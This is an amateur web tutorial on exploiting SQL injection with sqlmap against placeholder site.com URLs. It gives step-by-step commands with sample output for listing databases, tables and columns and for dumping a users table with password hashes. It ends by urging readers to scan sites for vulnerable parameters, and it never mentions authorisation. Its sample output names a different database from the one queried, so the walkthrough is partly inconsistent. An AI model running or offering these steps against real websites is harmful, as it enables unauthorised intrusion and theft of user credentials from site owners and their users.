.:: Educational Purpose Only ::.
what is sqlmap?
Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.
Vulnerable Url:
http://www.site.com/section.php?id=51
and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url
http://www.site.com/section.php?id=51'
Hacking with sqlmap
in console try this
sqlmap -u http://site.com/index.asp?id=765
Discover Databases
Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.
$ sqlmap -u "http://www.sitemap.com/section.php?id=51" --dbs
and the result should be
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: mywebdb
available databases [2]:
[*] information_schema
[*] mywebdb
Find tables in a particular database
Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'mywebdb
sqlmap -u "http://www.site.com/section.php?id=51" --tables -D mywebdb
and the output can be something similar to this
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables
Get columns of a table
Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.
sqlmap -u "http://www.site.com/section.php?id=51" --columns -D mywebdb -T users
The output can be something like this
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
+-------------------+--------------+
So now the columns are clearly visible. Good job!
Get data from a table
Now comes the most interesting part, of extracting the data from the table. The command would be
sqlmap -u "http://www.site.com/section.php?id=51" --dump -D mywebdb -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash | name | email | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank> |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
ok we did it,
now you are asking how you will get the exact vuln "id=" yea scan that site in some automated scanner if they detected a sql injection error then you will get a vulnerable link try on that i hope its might enough.